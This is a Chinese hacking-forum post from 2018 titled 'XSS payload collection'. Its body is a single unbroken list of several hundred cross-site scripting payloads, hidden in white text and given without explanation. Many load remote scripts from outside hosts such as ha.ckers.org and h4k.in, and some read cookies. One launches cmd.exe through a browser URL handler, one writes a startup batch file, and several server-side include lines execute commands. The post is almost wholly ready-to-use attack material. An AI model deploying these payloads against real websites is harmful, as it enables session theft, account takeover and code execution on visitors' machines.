找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1143|回复: 0
打印 上一主题 下一主题

xss payload大全

[复制链接]
跳转到指定楼层
楼主
发表于 2018-1-4 14:55:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
[color=rgb(255, 255, 255) !important]<script>alert('xss')</script><script>alert(string.fromcharcode(88,83,83))</script></title><script>alert(1)</script>'> <script>alert(3)</script>`> <script>alert(5)</script>> <script>alert(4)</script></title><script>alert(1)</script><<script>alert("xss");//<</script>>"''';!--"<XSS>=&{()}*/a=eval;b=alert;a(b(/e/.source));/*'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code><IFRAME SRC="javascript:alert('XSS');"></IFRAME><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out<DIV STYLE="background-image: url(http://ha.ckers.org/xss.js)">Div Body</DIV> alert(1)A=alert;A(1)+alert(0)+';//%0da=eval;b=alert;a(b(9));//a=1;a=eval;b=alert;a(b(11));//'};a=eval;b=alert;a(b(13));//1};a=eval;b=alert;a(b(14));//'];a=eval;b=alert;a(b(15));//1];a=eval;b=alert;a(b(17));//1;a=eval;b=alert;a(b(/c/.source));xyz onerror=alert(6);> XSS | Replacive Fuzzers>>This is a comment line to be changed in the future<img src=`x` onrerror= ` ;; alert(1) ` /></a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">style=color: expression(alert(0));" a="vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<width: expression((window.r==document.cookie)?'':alert(r=document.cookie))<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--><DIV STYLE="width: expression(alert('XSS'));"><IMG SRC="javascript:alert('XSS');"><IMG SRC="javascript:alert('XSS');"><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><IMG SRC=`javascript:alert("RSnake says### 'XSS'")`><IMG SRC="javascript:alert('XSS')"<IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert("XSS")><IFRAME SRC="javascript:alert('XSS');"></IFRAME><IMG SRC=javascript:alert(String.fromCharCode(88###83###83))><IMG DYNSRC="javascript:alert('XSS');"><IMG LOWSRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')>exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'><IMG SRC="javascript:alert('XSS');"><IMG SRC='vbscript:msgbox("XSS")'><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"><IMG SRC=javascript:alert('XSS')><IMGSRC="javascript:alert('XSS')"><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT><IMG SRC="   javascript:alert('XSS');"><XSS STYLE="xss:expression(alert('XSS'))"><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><IMG SRC=javascript:alert('XSS')>firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>> XSS | Replacive Fuzzers>>This is a comment line to be changed in the future(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)<STYLE TYPE="text/javascript">alert('XSS');</STYLE><SCRIPT SRC=http://ha.ckers.org/xss.js<A HREF="http://google:ha.ckers.org">XSS</A><A HREF="http://ha.ckers.org@google">XSS</A><A HREF="//google">XSS</A><IFRAME SRC=http://ha.ckers.org/scriptlet.html <y=<a>alert</a>;content[y](123)sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="with(document.__parent__)alert(1)style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="style=color: expression(alert(0));" a="style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="width: expression((window.r==document.cookie)?'':alert(r=document.cookie))sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="<DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="width: expression(alert('XSS'));"><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><STYLE TYPE="text/javascript">alert('XSS');</STYLE><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}'';!--"<script>alert(0);</script>=&{(alert(1))}</title><script>alert(1)</script></textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>'';!--"<XSS>=&{()}<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT><SCRIPT SRC=http://ha.ckers.org/xss.js<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><IMG SRC=javascript:alert('XSS')><IMG SRC=JaVaScRiPt:alert('XSS')><IMG SRC=`javascript:alert("XSS says, 'XSS'")`><IMG """><SCRIPT>alert("XSS")</SCRIPT>">",<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><IMG SRC=javascript:alert('XSS')><IMG SRC=javascript:alert('XSS')><IMG SRC="javascript:alert('XSS');"><IMG SRC="jav        ascript:alert(<WBR>'XSS');"><IMG SRC="javascript:alert(<WBR>'XSS');">/XSS STYLE=xss:expression(alert('XSS'))>XSS STYLE=xss:e/**/xpression(alert('XSS'))>XSS-STYLE=xss:e/**/xpression(alert('XSS'))>XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>"><script>alert('XSS')</script><xml id=i><x><c><![cdata[<img src="javas]]><![cdata[cript:alert('xss');">]]></c></x></xml><span datasrc=#i datafld=c dataformatas=html><xml id="xss"><i><b><img src="javas<!-- -->cript:alert('xss')"></b></i></xml><span datasrc="#xss" datafld="b" dataformatas="html"></span><html><body><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributename="innerhtml" to="xss<script defer>alert('xss')</script>"> </body></html><html xmlns:xss><?import namespace="xss" implementation="httP://ha.ckers.org/xss.htc"><xss:xss>xss</xss:xss></html><xml src="httP://ha.ckers.org/xsstest.xml" id=i></xml><span datasrc=#i datafld=c dataformatas=html></span><?xml version="1.0"?><html:html xmlns:html='httP://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;<body onload=a1={x:this.parent.document};a1.x.writeln(1);><body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;<body/s/onload=x={doc:parent.document};x.doc.writeln(1)<body/????$/onload=x={doc:parent[�document�]};x.doc.writeln(1)<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--><!--#exec cmd=""/usr/X11R6/bin/xterm ?display 127.0.0.1:0 &""-->httP://aa"><script>alert(123)</script>httP://aa'><script>alert(123)</script>httP://aa<script>alert(123)</script><SCRIPT>alert('XSS')</SCRIPT><SCRIPT SRC=http://testsite.com/xss.js></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><BASE HREF="javascript:alert('XSS');//"><BGSOUND SRC="javascript:alert('XSS');"><BODY BACKGROUND="javascript:alert('XSS');"><BODY ONLOAD=alert('XSS')><DIV STYLE="background-image: url(javascript:alert('XSS'))"><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"><DIV STYLE="width: expression(alert('XSS'));"><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><IFRAME SRC="javascript:alert('XSS');"></IFRAME><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><IMG SRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')><IMG DYNSRC="javascript:alert('XSS');"><IMG LOWSRC="javascript:alert('XSS');"><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<IMG SRC='vbscript:msgbox("XSS")'><LAYER SRC="http://testsite.com/scriptlet.html"></LAYER><IMG SRC="livescript:[code]">%BCscript%BEalert(%A2XSS%A2)%BC/script%BE<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"><IMG SRC="mocha:[code]"><STYLE TYPE="text/javascript">alert('XSS');</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><XSS STYLE="xss:expression(alert('XSS'))"><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><LINK REL="stylesheet" HREF="javascript:alert('XSS');"><LINK REL="stylesheet" HREF="http://testsite.com/xss.css"><STYLE>@import'http://testsite.com/xss.css';</STYLE><META HTTP-EQUIV="Link" Content="<http://testsite.com/xss.css>; REL=stylesheet"><STYLE>BODY{-moz-binding:url("http://testsite.com/xssmoz.xml#xss")}</STYLE><TABLE BACKGROUND="javascript:alert('XSS')"></TABLE><TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE><HTML xmlns:xss> <?import namespace="xss" implementation="http://testsite.com/xss.htc"> <xss:xss>XSS</xss:xss> </HTML><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN><XML SRC="http://testsite.com/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"><XSS STYLE="behavior: url(http://testsite.com/xss.htc);"><SCRIPT SRC="http://testsite.com/xss.jpg"></SCRIPT><BR SIZE="&{alert('XSS')}"><IMG SRC=JaVaScRiPt:alert('XSS')><IMG SRC=javascript:alert(&quot;XSS&quot;)><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></TITLE><SCRIPT>alert("XSS");</SCRIPT><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG SRC="jav ascript:alert('XSS');"><IMG SRC="jav&#x09;ascript:alert('XSS');"><IMG SRC="jav&#x0A;ascript:alert('XSS');"><IMG SRC="jav&#x0D;ascript:alert('XSS');"><IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " >perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> outperl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out<IMG SRC=" &#14; javascript:alert('XSS');"><SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIPT><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><SCRIPT SRC=http://testsite.com/xss.js<SCRIPT SRC=//testsite.com/.j><IMG SRC="javascript:alert('XSS')"<IFRAME SRC=http://testsite.com/scriptlet.html <<<SCRIPT>alert("XSS");//<</SCRIPT><IMG """><SCRIPT>alert("XSS")</SCRIPT>"><SCRIPT>a=/XSS/ alert(a.source)</SCRIPT><P STYLE="behavior:url('#default#time2')"><SCRIPT a=">" SRC="http://testsite.com/xss.js"></SCRIPT><SCRIPT ="blah" SRC="http://testsite.com/xss.js"></SCRIPT><SCRIPT a="blah" '' SRC="http://testsite.com/xss.js"></SCRIPT><SCRIPT "a='>'" SRC="http://testsite.com/xss.js"></SCRIPT><SCRIPT a=`>` SRC="http://testsite.com/xss.js"></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://testsite.com/xss.js"></SCRIPT><SCRIPT a=">'>" SRC="http://testsite.com/xss.js"></SCRIPT>7 g/ x% P. P1 @2 a2 B4 e- q7 ^

; p: ]: y4 [7 {0 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表